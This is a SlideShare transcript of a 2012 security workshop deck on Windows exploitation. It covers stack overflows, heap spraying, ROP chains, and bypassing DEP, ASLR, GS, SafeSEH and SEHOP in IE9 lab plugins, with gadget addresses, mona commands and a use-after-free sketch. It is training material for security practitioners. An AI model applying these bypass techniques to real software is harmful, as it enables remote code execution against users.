Your SlideShare is downloading. ×

Sintsov advanced exploitation in win32

2,339

Published on

0 Comments
2 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
2,339
On Slideshare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
118
Comments
0
Likes
2
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. Adv. Exploitation in win32 20 November 2012 Moscow, RUSSIA by Alexey Sintsov NOKIA Security, Privacy and Continuity @asintsov
  • 2. author.getBackground();• Senior Security Engineer at• Writer at• Co-Founder of• Ideology and co-organizer of
  • 3. workshop = new Workshop(); • Smashing the stack (classic BoF) • Use-After-Free • Heap Spray • DEP • ASLR • GS/SafeSEH/SEHOP => calc.exe
  • 4. workshop.getAgenda();1. BoF2. HeapSpray3. DEP/ROP – Exploit_14. /GS5. SafeSeh6. SEHOP7. vTable …8. ASLR by leak – Exploit_2 (DEP/ASLR/GS/safeSEH/SEHOP)9. UAF10. Exploit_3 (DEP/ASLR/GS/safeSEH/SEHOP)
  • 5. workshop.getExcluded();• Shellcode dev.• Metasploit (btw, there was workshop by Rick!)• Sandboxing• EMET bypass
  • 6. environment.getItems();Target ?• IE9• Windows 7Tools ?• Immunity Debugger• mona.py• Notepad(++) / vi http://immunityinc.com/products-immdbg.shtml http://redmine.corelan.be/projects/mona/repository/raw/trunk/1.8/mona.py
  • 7. workshop.loadLab();ie_lib_v2.zip• part_x – bin • Ex1 -> DEP/ASLR_1 • Ex2 -> GS/DEP/ASLR_1 • Ex3 -> vTable/ASLR_TRUE • Ex4 -> UAF/FULL Ex0. – Exercises 1) Install nptest2 Ex.1 plugin (part_1/bin/ex1.bat) 2) Open in IE /part1/exercises/ex0/demo.htm) – Bin 3) See sources… – Exploits
  • 8. Hey! Ho! Let’s go!
  • 9. theory.getList(); Bug Impact PayloadBoF in the stack • RET • Stack • SEH • HeapBoF in the Heap • Flink • HeapFormat strings • RET • Stack • SEH • HeapMemory • Bad pointer • Heapcorruption/Use afterfree/etc
  • 10. theory.getList().getMitig()[0]; Bug Impact Payload BoF in the stack • RET • Stack • SEH • Heap BoF in the Heap • Flink • Heap Format strings • RET • Stack • SEH • Heap Memory • Bad pointer • Heap corruption/Use after free/etc• Stack cookies • Save unlinking • Heap cookies
  • 11. theory.getList().getMitig()[1]; Bug Impact Payload BoF in the stack • RET • Stack • SEH • Heap BoF in the Heap • Flink • Heap Format strings • RET • Stack • SEH • Heap Memory • Bad pointer • Heap corruption/Use after free/etc• Stack cookies • Save unlinking • SEH handler validation • Heap cookies • SEH chain validation
  • 12. theory.getList().getMitig()[2]; Bug Impact Payload BoF in the stack • RET • Stack • SEH • Heap BoF in the Heap • Flink • Heap Format strings • RET • Stack • SEH • Heap Memory • Bad pointer • Heap corruption/Use after free/etc• Stack cookies • Save unlinking • SEH handler validation • Heap cookies • SEH chain validation • DEP • ASLR
  • 13. theory.getList().getMitig()[2].agenda; Bug Impact Payload BoF in the stack • RET • Stack • SEH • Heap BoF in the Heap • Flink • Heap Format strings • RET • Stack • SEH • Heap Memory • Bad pointer • Heap corruption/Use after free/etc • Stack cookies • SEH handler validation • SEH chain validation • DEP • ASLR
  • 14. theory.getBof();char* func(char *input){ Ex1. func(): Stack forchar buff[255]; memcpy(buff,input,strlen(buff)*sizeof(char)); 1) Open in IE /part1/exercises/crash.html return buff; buff blah C RET 2) Wait for alert();} 3) Attach to IE tab (Message) BoF (memcpy): buff blah C RET
  • 15. theory.Target[‘IE6’].howto();• Shellcode• HeapSpray• Ret/Jmp to Heap• Profit
  • 16. theory.getShellcode();• Assembler instructions• Program• Shell 8-)EIP ---------> Asm Code that doing something bad
  • 17. theory.getHeap();0x0c0c0c0c - Process Memory - Modules - Vuln. module. - System modules - Heap pages - Nop slice - Shellcode
  • 18. theory.getHeap(‘IE9’);• Array of strings (substring()…)…Header(0x10) 0061 0061 0061 0061 0061 0061 0061 0061 00 00
  • 19. theory.getAntiHeap(); Task 1:Nozzle 1) part1exercisesex2heap.htm- If block_parts contains asm_parts/NOP_sleds then No_Allocation! This HeapSpray doesnt work in IE9 because of ‘bubble’. Change the code and bypass it!Bubble- If next_block_parts eq prev_block_parts then No_Allocation!
  • 20. theory.getAnotherSpray();ActionScript (Flash)ImagesHTML5 …
  • 21. workshop.getMitigation(‘DEP’); Question: what pages still E?RW- -------------------------------------------------------------------------------- Add to ex2 (heap.htm) RET to 0x0C0C0C0C…. • Stack – not E • Heap – not E • RET  ???
  • 22. theory.getBypass(‘DEP’); retn2libcPush command: • WinExecDisable DEP by call: • NtSetinformationProcess • SetProcessDEPPolicy RETNCreate/change access: • VirtualAlloc • VirtualProtect • MapViewOfFile Permanent DEP (IE)Copy payload into thread: ASLR • WriteProcessMemory
  • 23. workshop.getMitigation(‘ASLR’); Where is VP? APP.DLL NTDLL.DLL APP2.DLL KERNEL32.DLL KERNEL32.DLL APP2.DLL NTDLL.DLL APP.DLL Before reboot After reboot
  • 24. workshop.getBypass(‘ASLR’)[0]; retn2libc System libs, like kernel32, urlmon, ntdll and etc at unknown address (ASLR) And we can’t use it for retn2libc, because we need to know address of functions, Task 2: like VirtualAlloc. … but, our lib DOES NOT support ASLR! Find static pointer to VirtualProtect
  • 25. theory.getROP()[0];R P • Find VirtualProtect(VP) address (static pointer to VP) • Find shellcode in memory (HeapSPray) • Prepare params for VP (ROP) • Calllllllllll (ROP) • Give control to shellcode (JMP ESP) All this can be done by Return Oriented Programming
  • 26. theory.getROP()[1];BoF with ROP: Buff Blah RET ROP ROP ROP ROP ROP «Write at 0x0A0A0A0A value 0x10» CODE CPU STACKPOP EDI 0x7C010102: RETN 0x8C010103MOV EAX, 0x10 0x8C010103: POP EDI 0x0A0A0A0AMOV [EDI], EAX 0x8C010104: RETN 0x8C020104 R 0x8C020105: POP EAX 0xFFFFFFF0 O 0x8C020106: RETN 0x8C030105 P 0x8C030107: NEG EAX 0x8C040106MOV EAX, 0x10 0x8C030108: RETN 0x8C040109: MOV [EDI], EAX 0x8C05010B: RETN
  • 27. theory.getROP()[2]; StackPivot• You do not control stack• You do not know addresses in stack• Yours ROP is in the Heap• You exploiting SEHIn those cases you should change ESP. It must point on page which is controlled . Useful gadgets: • ADD EBP, xxx / LEAVE / RETN • MOV ESP, xxx / RETN • ADD or SUB ESP, xxx / RETN • XCHG ESP, xxx / RETN • etc
  • 28. workshop.getROP()[3]; Task 3:• part1exercisesex3exploit.htm !mona noaslr ROP_NOP_SLED = 0x414445ab # RETN• !mona rop –m nptest2 (do not HeapSpray (line in: /part_1/rop/ex1/*.txt) 1. Fix run, results are 44).• HeapSpray with ROP (line shellcode 2. Build stackPivot and 80) by using:• 1. 0x41461605 : # MOV ESP,EBP # POP EBP # RETN Notepad roxXx 2 (for stack pivot)• Build BoF string (call:VirtualProtect/Alloc) 2. 0x414619AF # POP EBP # RETN 8 ROP• Exploit it! ESP=0x0c0c0c0c  ROP_NOP_SLED address 3. Make 4. Get calc.exe! ShellcodeHEAP SPRAY
  • 29. workshop.pause();
  • 30. workshop.continue(); • GS • SEHOP • safeSEH
  • 31. theory.getMitigation(‘GS’)[0]; C buff blah RET1) Calc value C (cookie)
  • 32. theory.getMitigation(‘GS’)[1]; C buff blah RET1) Calc value C (cookie)2) Save C in the .data
  • 33. theory.getMitigation(‘GS’)[2]; C buff blah C RET1) Calc value C (cookie)2) Save C in the .data3) Place C before RET
  • 34. theory.getMitigation(‘GS’)[3]; C buff blah C RET1) Calc value C (cookie)2) Save C in the .data3) Place C before RET4) Strcpy
  • 35. theory.getMitigation(‘GS’)[4]; C != C buff blah C RET + /GS. 1) Install nptest2 Ex.2 plugin (/part1/bin/ex2.bat)1) Calc value C (cookie) 2) Run exploit…2) Save C in the .data …3) Place C before RET4) Strcpy5) Before RET – check C from stack with C from .data
  • 36. theory.getBypass(‘GS’);Bypass: • Entropy / static cookie • Rewrite cookie in .data mov [ecx], edx  CRASH • vTable rewrite call [ecx]  CRASH • SEH Rewrite and CRASH
  • 37. theory.getSEH();Before BoF: Buff blah C RET Next SEH SEH Handler’s code
  • 38. workshop.callSEH();Task:4--------------------------------------------------------------------------------part1exercisesex4seh.htm Before:Trigger SEH before /GS check… Buff ns seh C RET After: Buff ns seh C RET Re-write SEH!
  • 39. theory.getMitigation(‘SEHOP’); Next SEH SEH handler1 Next SEH SEH handler2 Next SEH SEH handler3 Next SEH SEH handler4 0xFFFFFFFF SEH ntdll!FinalExceptionHandler
  • 40. theory.getBypass(‘SEHOP’); Bypass: Also /GS • vTable rewrite bypass call [ecx + x]  CRASH • Leak ntdll/origStack addr and use it in heapSpray/nSEH: 0xFFFFFFFF ntdll!FinalExceptHandlernSEHSEH ROP/Shellcode
  • 41. theory.getMitigation(‘safeSEH’); SafeSEH table for nptest2: Next SEH SEH1 handler1 SEH1 Next SEH SEH2 handler2 SEH2 Next SEH SEH3 handler3 SEH3 SEH4 Next SEH SEH4 handler4 0xFFFFFFFF SEH ntdll!FinalExceptionHandler
  • 42. theory.getBypass(‘safeSEH’);Bypass:Task 5:-------------------------------------------------------------------------------- and Also /GS • vTable rewrite SEHOP bypass call vTable Find how to trigger[ecx + x]call ? CRASH • Pointer on module without SafeSEH
  • 43. workshop.loadFull();GS/SEHOP/SafeSEH/DEP/ASLR• part1binEx4.bat• Now nptest2 support ASLR too!• !mona noaslrWe can’t build ROP, we do not know any address…
  • 44. workshop.getBypass(‘ASLR’)[1];  Modules without ASLR • static base address – call functions from modules with unknown address Task 6: What about Ex0 ? What can we do? --------------------------------------------------------------------------------  Memory leakage bugz  Rewrites low bytes  Brute force high bytes  Spraying : • javascript Heap Spray • java heap spray • .NET • JIT Spray • e.t.cGood examples: http://www.vupen.com/blog/
  • 45. workshop.exploitVTable();Task 7: part1exercisesex5final.htm• Exploit Leak!• Build ROP by leaked nptest2 address• Make pwning ESP (stack pivot) ESP -> HeapSpray -> ROP• Make heap executable• Run shellcode!
  • 46. workshop.pause();
  • 47. workshop.continue(); • Use-After-Free
  • 48. theory.getUAF()[0]; - Process Memory - Modules - Object with pointer - System modules - Heap pages CALL 0x0C0C0C0CObject *obj = (Object *)malloc(sizeof(Object));obj->callMethod();free(obj);HeapSpray(0x0c0c0c0c);obj->callMethod();
  • 49. theory.getUAF()[1]; - Some objects - Object with pointer - Attacker’s blocks1) Free();2) Spray(); SIZE MATTERS
  • 50. workshop.getUAF();1. part2binuaf.bat2. part2exercisesFig1demo.htm vulnPlugin2.InitRed(31337,0x31333331); Taskvar a = vulnPlugin2.CallRed(); 8: Find UAF -------------------------------------------------------------------------------- alert(a); //a=31337 Task 9: Rewrite object by using InitString(); Full armored: ALSR/DEP/GS/SEH/SEHOP vulnPlugin2.FreeRed(); -------------------------------------------------------------------------------- vulnPlugin2.InitGreen(666,0x31333331); var b = vulnPlugin2.CallRed(); alert(b); //b= ??? Useless ROP
  • 51. theory.getLeak()[0];Obj1 , Freed… - Data - PointerObj2, same size…Obj2.ReadData() ---- ???
  • 52. theory.getLeak()[1]; Obj1 , Freed… - DataTask 10: Get leak by using InitOther(); - Pointer-------------------------------------------------------------------------------- Obj2, same size… Obj1.ReadData() ---- ???
  • 53. workshop.exploitUAF();Task 11: part2exercisesFig2final.htm• Exploit Leak!• Build ROP by leaked address• Make pwning ESP (stack pivot) ESP -> HeapSpray -> ROP• Make heap executable• Run shellcode!
  • 54. delete workshop;twitter.com/asintsov alexey.sintsov@nokia.com www.defcon-russia.ru www.zeronights.ru

×